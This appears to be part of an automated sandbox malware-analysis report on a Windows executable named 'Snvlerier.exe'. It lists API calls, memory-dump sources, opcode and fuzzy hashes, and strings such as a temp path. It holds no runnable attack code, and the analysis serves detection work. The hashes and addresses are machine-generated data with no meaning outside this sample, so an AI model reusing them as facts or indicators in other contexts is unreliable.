                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: File$AttributesCreate
                                              • String ID:
                                              • API String ID: 415043291-0
                                              • Opcode ID: 2020914b50985dcdb8a9d1ef810344635b85a4bb7357cfeb99e90a7b3aa1e253
                                              • Instruction ID: c727d95bf85a9f0c46f508d678723c0d1dcafa8a6692923939b5ca3624017546
                                              • Opcode Fuzzy Hash: 2020914b50985dcdb8a9d1ef810344635b85a4bb7357cfeb99e90a7b3aa1e253
                                              • Instruction Fuzzy Hash: C6D09E31658201EFEF098F20DE16F2E7AA2EB84B00F10562CB682941E0D6755815DB26
                                              APIs
                                              • GetFileAttributesA.KERNELBASE(?,?,0040558E,?,?,00000000,00405771,?,?,?,?), ref: 0040597B
                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040598F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                              • Instruction ID: c3ff523ec0e14d770cb53abc783e71abf85e1a3e01f0222887215096031e9b53
                                              • Opcode Fuzzy Hash: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                              • Instruction Fuzzy Hash: 68D01272908120BFC211272CEE0C89BBF95DF55372B018B31F969A22F0C7304C52CA96
                                              APIs
                                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B39
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 3fe2b39a6150e727ce5c62af9a1385554e052d9287acca8dadd305d7aaff74be
                                              • Instruction ID: 99bb6b85d4ae222cccedfef93e18895b5f5f64d5e6e30e7006242df846a22e50
                                              • Opcode Fuzzy Hash: 3fe2b39a6150e727ce5c62af9a1385554e052d9287acca8dadd305d7aaff74be
                                              • Instruction Fuzzy Hash: 05E0E676650109BFD710EFA5ED4BFAA7BECB704715F004025B608D7091CA78E5509B59
                                              APIs
                                              • SendMessageA.USER32(00010466,00000000,00000000,00000000), ref: 0040405B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 7802ee5bcb9b475bb6e7edaa61fead218f6f5a775150d46ef8532a87540a1813
                                              • Instruction ID: a5f8a78fee9e7221a8c44bbb8f6921aad9e98f8002020586e1cad371b80f8bee
                                              • Opcode Fuzzy Hash: 7802ee5bcb9b475bb6e7edaa61fead218f6f5a775150d46ef8532a87540a1813
                                              • Instruction Fuzzy Hash: 0BC092B1B44300BBEE718F609D89F0777A9AB90B01F248479B315FA1E0C678E450DA2D
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EAE,000463E4), ref: 00403210
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                              • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                              • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                              • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                              APIs
                                              • SendMessageA.USER32(00000028,?,00000001,00403E63), ref: 00404040
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 98a9e43136b75bea9972f4fbd108270b8ce5324b049e2a55bbaeca25b86b73b2
                                              • Instruction ID: 7a64bccd6827927bfff433ef8e3e44c8eab9a88b5ddb8beda05425e4ece00738
                                              • Opcode Fuzzy Hash: 98a9e43136b75bea9972f4fbd108270b8ce5324b049e2a55bbaeca25b86b73b2
                                              • Instruction Fuzzy Hash: 09B09236684200BAEA228B00DD09F457A62E764B02F018024B210240B0C6B300A5DB19
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 00405197
                                              • GetDlgItem.USER32(?,000003EE), ref: 004051A6
                                              • GetClientRect.USER32(?,?), ref: 004051E3
                                              • GetSystemMetrics.USER32(00000015), ref: 004051EB
                                              • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 0040520C
                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040521D
                                              • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405230
                                              • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 0040523E
                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405251
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405273
                                              • ShowWindow.USER32(?,00000008), ref: 00405287
                                              • GetDlgItem.USER32(?,000003EC), ref: 004052A8
                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052B8
                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052D1
                                              • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004052DD
                                              • GetDlgItem.USER32(?,000003F8), ref: 004051B5
                                                • Part of subcall function 00404032: SendMessageA.USER32(00000028,?,00000001,00403E63), ref: 00404040
                                              • GetDlgItem.USER32(?,000003EC), ref: 004052FA
                                              • CreateThread.KERNEL32(00000000,00000000,Function_000050CC,00000000), ref: 00405308
                                              • CloseHandle.KERNEL32(00000000), ref: 0040530F
                                              • ShowWindow.USER32(00000000), ref: 00405333
                                              • ShowWindow.USER32(00000000,00000008), ref: 00405338
                                              • ShowWindow.USER32(00000008), ref: 0040537F
                                              • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004053B1
                                              • CreatePopupMenu.USER32 ref: 004053C2
                                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053D7
                                              • GetWindowRect.USER32(00000000,?), ref: 004053EA
                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040540E
                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405449
                                              • OpenClipboard.USER32(00000000), ref: 00405459
                                              • EmptyClipboard.USER32 ref: 0040545F
                                              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405468
                                              • GlobalLock.KERNEL32(00000000), ref: 00405472
                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405486
                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040549F
                                              • SetClipboardData.USER32(00000001,00000000), ref: 004054AA
                                              • CloseClipboard.USER32 ref: 004054B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: {
                                              • API String ID: 590372296-366298937
                                              • Opcode ID: b3abe880cfff7cea9be0a4f1761446cb6b4c81a67f2fac3ff0bfe02cad0bbcae
                                              • Instruction ID: a43d5875affcd71576abb7eb989cb95ef914942cb0476843b394c91df0c531c3
                                              • Opcode Fuzzy Hash: b3abe880cfff7cea9be0a4f1761446cb6b4c81a67f2fac3ff0bfe02cad0bbcae
                                              • Instruction Fuzzy Hash: 7FA15D70900208BFDB219F60DC89AAE7F79FB04355F10807AFA15BA2A0C7795E41DF59
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 0040448A
                                              • SetWindowTextA.USER32(00000000,?), ref: 004044B4
                                              • SHBrowseForFolderA.SHELL32(?,0041F8B8,?), ref: 00404565
                                              • CoTaskMemFree.OLE32(00000000), ref: 00404570
                                              • lstrcmpiA.KERNEL32(Space required: ,004204E0), ref: 004045A2
                                              • lstrcatA.KERNEL32(?,Space required: ), ref: 004045AE
                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045C0
                                                • Part of subcall function 00405502: GetDlgItemTextA.USER32(?,?,00000400,004045F7), ref: 00405515
                                                • Part of subcall function 00405F58: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Snvlerier.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403225,C:\Users\user\AppData\Local\Temp\,74DF3410,004033FA), ref: 00405FB0
                                                • Part of subcall function 00405F58: CharNextA.USER32(?,?,?,00000000), ref: 00405FBD
                                                • Part of subcall function 00405F58: CharNextA.USER32(?,"C:\Users\user\Desktop\Snvlerier.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403225,C:\Users\user\AppData\Local\Temp\,74DF3410,004033FA), ref: 00405FC2
                                                • Part of subcall function 00405F58: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403225,C:\Users\user\AppData\Local\Temp\,74DF3410,004033FA), ref: 00405FD2
                                              • GetDiskFreeSpaceA.KERNEL32(0041F4B0,?,?,0000040F,?,0041F4B0,0041F4B0,?,00000000,0041F4B0,?,?,000003FB,?), ref: 0040467B
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404696
                                              • SetDlgItemTextA.USER32(00000000,00000400,0041F4A0), ref: 0040471C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                              • String ID: A$C:\Users\user\AppData\Local\Temp\carinal\Coracosteon$Space required:
                                              • API String ID: 2246997448-3079292594
                                              • Opcode ID: 6569fa988130ded445258d468ad79f2992f9bcaf74587b0992117abcc265364a
                                              • Instruction ID: 91554f0dc6ea4600d6aa684f61a87f86a90d73764b8ca610638d002fad7b49e0
                                              • Opcode Fuzzy Hash: 6569fa988130ded445258d468ad79f2992f9bcaf74587b0992117abcc265364a
                                              • Instruction Fuzzy Hash: 329161B1900209ABDB10AFA1DD85AAF77B8EF85314F10847BF701B72D1D77C9A418B69
                                              APIs
                                              • DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 004055F3
                                              • lstrcatA.KERNEL32(004214E8,\*.*,004214E8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 0040563B
                                              • lstrcatA.KERNEL32(?,00409014,?,004214E8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 0040565C
                                              • lstrlenA.KERNEL32(?,?,00409014,?,004214E8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405662
                                              • FindFirstFileA.KERNEL32(004214E8,?,?,?,00409014,?,004214E8,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405673
                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405720
                                              • FindClose.KERNEL32(00000000), ref: 00405731
                                              Strings
                                              • "C:\Users\user\Desktop\Snvlerier.exe", xrefs: 004055CA
                                              • \*.*, xrefs: 00405635
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004055D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\Snvlerier.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                              • API String ID: 2035342205-2862073288
                                              • Opcode ID: 08cb3561293760783583fce89923e138031543c6a487ec679cd5ea2563bcffaf
                                              • Instruction ID: cb54ed1a216ef8652346c78b67106089f10266c829cd8aaca764d45e9672858b
                                              • Opcode Fuzzy Hash: 08cb3561293760783583fce89923e138031543c6a487ec679cd5ea2563bcffaf
                                              • Instruction Fuzzy Hash: 9351CE30904A05EADB21AB258C85BBF7A78DF42714F54443FF455B22D2D73C8982EE6E
                                              APIs
                                              • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,004093B0,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\carinal\Coracosteon, xrefs: 004020C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: ByteCharCreateInstanceMultiWide
                                              • String ID: C:\Users\user\AppData\Local\Temp\carinal\Coracosteon
                                              • API String ID: 123533781-979337295
                                              • Opcode ID: 05308c98f9ef81f350d1af3358afb4fa7f75ab45f6f366ec631eab8224b100da
                                              • Instruction ID: 0794f85a44406b1db5e2c2977616379bf493c650535e823796661963985c9e87
                                              • Opcode Fuzzy Hash: 05308c98f9ef81f350d1af3358afb4fa7f75ab45f6f366ec631eab8224b100da
                                              • Instruction Fuzzy Hash: 86415E75A00205BFDB00EFA4CD88EAE7BB5EF49314F204169F905EB2D1CA79AD41CB65
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040265E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: f383b2276f778affb4c9086af86e6bb0f7741b7bf67dbbeaf1c24fcdc32727bf
                                              • Instruction ID: 4021821676d0c49cb174ca7e582841b18d0bfe14ebfea62fe5bd6cd07a05b7b2
                                              • Opcode Fuzzy Hash: f383b2276f778affb4c9086af86e6bb0f7741b7bf67dbbeaf1c24fcdc32727bf
                                              • Instruction Fuzzy Hash: BEF0A7326082109BE700E7B4A9499EEB7789B15314F60057FE101E20C1D6B85945DE2E
                                              APIs
                                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041D1
                                              • GetDlgItem.USER32(00000000,000003E8), ref: 004041E5
                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404203
                                              • GetSysColor.USER32(?), ref: 00404214
                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404223
                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404232
                                              • lstrlenA.KERNEL32(?), ref: 00404235
                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404244
                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404259
                                              • GetDlgItem.USER32(?,0000040A), ref: 004042BB
                                              • SendMessageA.USER32(00000000), ref: 004042BE
                                              • GetDlgItem.USER32(?,000003E8), ref: 004042E9
                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404329
                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00404338
                                              • SetCursor.USER32(00000000), ref: 00404341
                                              • ShellExecuteA.SHELL32(0000070B,open,00422E80,00000000,00000000,00000001), ref: 00404354
                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00404361
                                              • SetCursor.USER32(00000000), ref: 00404364
                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404390
                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                              • String ID: N$Space required: $open
                                              • API String ID: 3615053054-943464700
                                              • Opcode ID: 5e333649279e7fa4ea9645e9b48a6e50a54fd6ad2684c15c0239fea06aadb274
                                              • Instruction ID: 6418c29673160043acca1fa30efc4fe844f6c98f319872f9256a51e7231b6627
                                              • Opcode Fuzzy Hash: 5e333649279e7fa4ea9645e9b48a6e50a54fd6ad2684c15c0239fea06aadb274
                                              • Instruction Fuzzy Hash: 2161B5B1A40205BFEB109F61DC45F6A7B69FB84714F10813AFB05BA2D1C7B8A951CF98
                                              APIs
                                              • lstrcpyA.KERNEL32(00422270,NUL,?,00000000,?,00000000,?,00405BC9,?,?,00000001,00405789,?,00000000,000000F1,?), ref: 00405A23
                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BC9,?,?,00000001,00405789,?,00000000,000000F1,?), ref: 00405A47
                                              • GetShortPathNameA.KERNEL32(00000000,00422270,00000400), ref: 00405A50
                                                • Part of subcall function 00405900: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B12,00000000,[Rename]), ref: 00405910
                                                • Part of subcall function 00405900: lstrlenA.KERNEL32(?,?,00000000,00405B12,00000000,[Rename]), ref: 00405942
                                              • GetShortPathNameA.KERNEL32(?,00422670,00000400), ref: 00405A6D
                                              • wsprintfA.USER32 ref: 00405A8B
                                              • GetFileSize.KERNEL32(00000000,00000000,00422670,C0000000,00000004,00422670,?,?,?,?,?), ref: 00405AC6
                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405AD5
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405AEF
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405B1F
                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00421E70,00000000,-0000000A,00409384,00000000,[Rename]), ref: 00405B75
